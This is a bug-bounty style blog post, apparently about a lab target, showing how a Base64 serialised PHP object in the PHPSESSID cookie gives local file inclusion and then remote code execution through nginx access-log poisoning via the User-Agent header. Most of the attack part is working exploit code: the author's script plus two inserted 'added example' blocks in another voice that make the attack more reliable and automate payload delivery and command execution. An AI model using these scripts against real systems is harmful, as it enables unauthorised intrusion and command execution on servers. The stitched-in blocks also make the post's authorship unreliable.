LFI to RCE — Bug bounty

Facundo Fernandez
5 min read · Nov 7, 2023


Alright guys, in my latest post, I shared how a simple SQL query enabled me to take over an account. If you haven’t read it yet, go ahead and take a look, like it, comment, and share!

I would love to connect with you on LinkedIn; if you haven't already, send me a request, I would love to be friends.

HAPPY HACKING

After a few hours of gathering info on this web app and doing recon, I noticed a cookie: PHPSESSID=

PHPSESSID — PHPSESSID is the default name of PHP's session cookie. It is a temporary cookie (it expires when you close your browser) that identifies your session. Normally its value is nothing but an opaque random session ID, and the actual session data stays on the server. This one was different: the value was clearly Base64, meaning the application was storing serialised state in the cookie itself, where the client can read and change it.

⚠️PRO TIP: Always try to decode these!⚠️

Two easy ways to decode it:

1. Paste it into base64decode.org.
2. Use Python's base64 module (base64.b64decode).

Decoded, the cookie turns out to be a serialised PHP object rather than a session ID, along the lines of:

O:9:"PageModel":1:{s:4:"file";s:15:"/www/index.html";}

/www/index.html is 15 characters — that is why the string is prefixed s:15. PHP's serialised strings carry their length (in bytes, not characters), so whenever you change the value you must update that number as well or unserialize() will reject the cookie.

With that information in mind let’s play a little bit and see if we can exploit this!

LFI vulnerability

What is LFI?

Local File Inclusion is a vulnerability in which user input controls which file on the web server the application includes or reads. At minimum it exposes any file the web server process can read (configuration, source code, /etc/passwd); when the controlled path ends up in a PHP include() or require(), anything in that file that looks like PHP is executed, which is how LFI escalates to remote code execution (and, if the file is reflected to other users, to cross-site scripting).

What if I replace /www/index.html with /etc/passwd? (Remember to update the length prefix too: /etc/passwd is 11 bytes, so s:15 becomes s:11.)

You guys can use an online decoder or follow my steps using Python!

Now that I have my new malicious cookie encoded, I am going to do this in three different ways to demonstrate different exploitation paths:

1. Change the cookie in the browser and retrieve the info
2. Send a request using Python and print the results
3. Change the cookie using Burp Suite
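The following is an added example of my own, not code from the original post: it builds and parses the PageModel cookie described above, computing the s:N length prefix automatically from the byte length of the path (PHP counts bytes, so a non-ASCII path gets a bigger prefix than its character count) and rejecting a cookie whose prefix no longer matches its value, which is the usual reason a hand-edited cookie silently stops working. The class name PageModel and the field name "file" are taken from the post's decoded cookie; the sample cookies are constructed here, and the target URL in the usage call is the one from the post's script and is only an assumption.

```python
import base64
import re
import urllib.request
from typing import List, Optional, Tuple

# Constructed sample: the decoded cookie shape the post describes, a serialized
# PageModel whose "file" field points at /www/index.html (15 bytes, hence s:15).
SAMPLE_SERIALIZED = b'O:9:"PageModel":1:{s:4:"file";s:15:"/www/index.html";}'
SAMPLE_COOKIE = base64.b64encode(SAMPLE_SERIALIZED).decode()

# Constructed mistake: the path was swapped for /etc/passwd but s:15 was left in place.
STALE_LENGTH_COOKIE = base64.b64encode(
    b'O:9:"PageModel":1:{s:4:"file";s:15:"/etc/passwd";}').decode()

_STR_PREFIX = re.compile(rb's:(\d+):"')


def php_strings(serialized: bytes) -> List[Tuple[int, bytes]]:
    """Return every s:N:"..." value in a PHP serialized blob as (N, bytes).

    Slices by the declared length, the way unserialize() does, so quotes or
    semicolons inside a value cannot confuse the walk, and raises if the
    declared length does not land exactly on the closing quote-semicolon."""
    out = []
    pos = 0
    while True:
        m = _STR_PREFIX.search(serialized, pos)
        if not m:
            return out
        n, start = int(m.group(1)), m.end()
        if serialized[start + n:start + n + 2] != b'";':
            raise ValueError(f"length prefix s:{n} at offset {m.start()} is wrong")
        out.append((n, serialized[start:start + n]))
        pos = start + n + 2


def cookie_is_valid(cookie_b64: str) -> bool:
    """True if every string in the decoded cookie has a correct length prefix."""
    try:
        php_strings(base64.b64decode(cookie_b64))
        return True
    except ValueError:
        return False


def file_field(cookie_b64: str) -> Optional[str]:
    """The value stored under the "file" key, or None if the key is absent."""
    strings = php_strings(base64.b64decode(cookie_b64))
    for i, (_, value) in enumerate(strings):
        if value == b"file" and i + 1 < len(strings):
            return strings[i + 1][1].decode()
    return None


def serialize_page(path: str) -> bytes:
    """Serialized PageModel pointing at `path`. The prefix is computed from the
    UTF-8 byte length of the path, because that is what PHP checks."""
    raw = path.encode()
    return b'O:9:"PageModel":1:{s:4:"file";s:%d:"%s";}' % (len(raw), raw)


def build_cookie(path: str) -> str:
    """Base64 cookie value ready to drop into PHPSESSID."""
    return base64.b64encode(serialize_page(path)).decode()


def fetch_file(url: str, path: str) -> str:
    """Send the cookie and return the response body, i.e. the included file."""
    req = urllib.request.Request(
        url, headers={"Cookie": "PHPSESSID=" + build_cookie(path)})
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    # Assumed target (the host from the post's script); use only a host you are allowed to test.
    print(fetch_file("http://142.93.32.153:31043", "/etc/passwd"))
```

The parser walks strings by their declared length instead of splitting on quotes, which is also how you would spot an injected value that contains `";` in a real application's cookie. Run `cookie_is_valid` on any cookie you edit by hand before sending it; a stale prefix is the most common reason the include quietly falls back to an error page.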

LFI to RCE

What is RCE?

Remote code execution (RCE) attacks allow an attacker to remotely execute malicious code on a computer. The impact of an RCE vulnerability can range from malware execution to an attacker gaining full control over a compromised machine.

To do this I am going to use Python, why? Because Python is fun. I will give a thorough explanation of my script in a minute, so sit tight.

One of the easiest ways to turn an LFI vulnerability into RCE is log poisoning: you cannot upload a file, but the web server is constantly writing one for you.

What is log poisoning?

Log poisoning (or log injection) is a technique in which the attacker gets their own content, in this case PHP code, written into a log file on the server, then uses the LFI to include that log file so the code is executed, to run commands or to get a reverse shell. It only works when the application is already vulnerable to LFI, and specifically when the controlled path reaches include()/require(): a read-only LFI (file_get_contents, readfile) will show you your payload in the log but never execute it.

In this case I am not allowed to try to get a reverse shell, so I will simply try to list a directory using, “ls -lsa” — “ls -l”

Remember, the LFI vuln. only lets us read/execute files that already exist, not write or create new ones. So how are we going to inject code? Well, every request we send gets written to the web server's log file, doesn't it?

First, we need to know which web server is running (the Server response header tells us):

NGINX!! Its access log lives by default at /var/log/nginx/access.log (for Apache it would be /var/log/apache2/access.log), and every request, including the User-Agent header, is written there. Note that the include will only work if that file is readable by the user the PHP process runs as.

First let's see if we can read the log file with our Python script by pointing the cookie's file field at it:

Nice, we can!! Now let's see if we can write to it by way of the User-Agent header, which nginx logs more or less verbatim. One caveat to remember for the payload: nginx's default log escaping rewrites double quotes and backslashes as \xNN sequences, so stick to single quotes in the PHP.

In my Python Script, I will add the following:

headers = {'User-Agent': 'Facundo Fernandez'}

And we get our name back in the included log:

Instead of typing my name let's log some PHP:

headers = {'User-Agent': "<?php system('ls -lsa');?>"}

Successful Remote Code Execution! If the output is not in the very first response, send the request once more: nginx writes the access-log entry after the response has been sent, so the poisoned line is only there for the next include. Also keep every fragment you log syntactically valid, because the include runs everything that was ever logged, and one broken `<?php` line will make PHP bail out before it reaches your new payload.

Code explanation:

import base64
import requests
# base64 decodes and re-encodes the cookie; requests sends the HTTP request.

# Building the serialized PHP object the application expects in its cookie.
# The app unserializes it and passes the "file" field to an include, so we
# choose which file gets included. s:25 is the byte length of the path.
malicious_cookie = b'O:9:"PageModel":1:{s:4:"file";s:25:"/var/log/nginx/access.log";}'
print('Malicious Cookie:', malicious_cookie)
# Printing the serialized object for demonstration.

# Base64-encoding it, because that is how this application stores the cookie value.
malicious_cookie_encoded = base64.b64encode(malicious_cookie)
print('Malicious cookie encoded:', malicious_cookie_encoded)
# Printing the base64-encoded version of the malicious cookie.

# Our target.
# Only point this at a host you own or have permission to test.
url = 'http://142.93.32.153:31043'

# The PHPSESSID cookie now carries our serialized object instead of a session ID.
cookies = {'PHPSESSID': malicious_cookie_encoded.decode()}

# The PHP code travels in the User-Agent header, which nginx writes to the access log.
# When the app includes the log, PHP executes the fragment and runs 'ls -lsa'.
headers = {'User-Agent': "<?php system('ls -lsa');?>"}

# Sending a GET request with the malicious cookie and header.
r = requests.get(url, cookies=cookies, headers=headers)
print(r.text)
# The response is the included log file. If the server executed our code,
# the output of 'ls -lsa' appears in it in place of the logged PHP tag.
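As an added example of my own (not the author's script), here is the same log-poisoning attack written as a repeatable two-step flow that avoids the problems noted above: it first checks that the access log is really includable and that the User-Agent is logged, then writes the payload with a harmless cookie and only afterwards includes the log, so the poisoned line has been flushed by the time it is executed. The command is base64-encoded inside the PHP and the PHP uses only single quotes, so nginx's escaping of double quotes cannot break it, and random markers let the output be cut out of the large log that comes back. The target URL, the log path and the PageModel/file names are taken from the post and are assumptions; the sample response is constructed.

```python
import base64
import secrets
import urllib.request
from typing import Optional

# Assumed values from the post; replace with your own authorised target.
URL = "http://142.93.32.153:31043"
ACCESS_LOG = "/var/log/nginx/access.log"
HARMLESS_FILE = "/www/index.html"

# Constructed sample of what the included log looks like after a payload ran:
# the logged PHP tag is replaced by the command output wrapped in the markers.
SAMPLE_RESPONSE = (
    '10.0.0.1 - - [07/Nov/2023:10:00:00 +0000] "GET / HTTP/1.1" 200 5 "-" "probe-1234"\n'
    '10.0.0.1 - - [07/Nov/2023:10:00:01 +0000] "GET / HTTP/1.1" 200 5 "-" '
    '"@@aa@@total 8\ndrwxr-xr-x 2 www www 4096 Nov  7 10:00 .\n@@bb@@"\n'
)


def page_cookie(path: str) -> str:
    """Base64 of the serialized PageModel whose file field is `path`."""
    raw = path.encode()                      # PHP's s:N counts bytes
    return base64.b64encode(
        b'O:9:"PageModel":1:{s:4:"file";s:%d:"%s";}' % (len(raw), raw)).decode()


def php_payload(cmd: str, start: str, end: str) -> str:
    """PHP one-liner for the User-Agent. The command is carried as base64 and the
    code uses only single quotes: nginx's default escaping writes a literal
    double quote to the log as \x22, which would break the PHP before it runs."""
    b64 = base64.b64encode(cmd.encode()).decode()
    return f"<?php echo '{start}'; system(base64_decode('{b64}')); echo '{end}'; ?>"


def extract_output(body: str, start: str, end: str) -> Optional[str]:
    """Command output between the markers, or None if the payload did not run."""
    i = body.find(start)
    if i < 0:
        return None
    i += len(start)
    j = body.find(end, i)
    return body[i:j] if j >= 0 else None


def get(url: str, path: str, user_agent: str) -> str:
    """One GET with the PageModel cookie pointing at `path`; returns the body."""
    req = urllib.request.Request(url, headers={
        "Cookie": "PHPSESSID=" + page_cookie(path),
        "User-Agent": user_agent,
    })
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode(errors="replace")


def run_via_log(url: str, cmd: str) -> Optional[str]:
    """Poison the access log with `cmd` and return its output, or None on failure."""
    start = "@@" + secrets.token_hex(4) + "@@"
    end = "@@" + secrets.token_hex(4) + "@@"
    # 1. Prove the log is includable and that the User-Agent lands in it,
    #    before writing any PHP to a file we cannot clean up.
    probe = "probe-" + secrets.token_hex(6)
    get(url, HARMLESS_FILE, probe)                       # gets logged
    if probe not in get(url, ACCESS_LOG, "check"):       # include the log
        return None                                      # unreadable or UA not logged
    # 2. Write the payload while including a harmless file; nginx logs the
    #    line after this response, so it is not executed half-written.
    get(url, HARMLESS_FILE, php_payload(cmd, start, end))
    # 3. Include the log: every logged PHP fragment runs, ours prints between markers.
    return extract_output(get(url, ACCESS_LOG, "trigger"), start, end)


if __name__ == "__main__":
    print(run_via_log(URL, "ls -lsa"))
```

Because the include re-executes every PHP fragment ever written to the log, including those left by other testers, one malformed fragment anywhere in the file will stop PHP before your payload; the probe step at least tells you whether the include itself still works before you add to the problem. On a shared lab box, prefer a single well-formed payload over repeated experiments.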

Thanks for reading, if you have any questions, comment and I will get back to you!

Let’s connect on LinkedIn
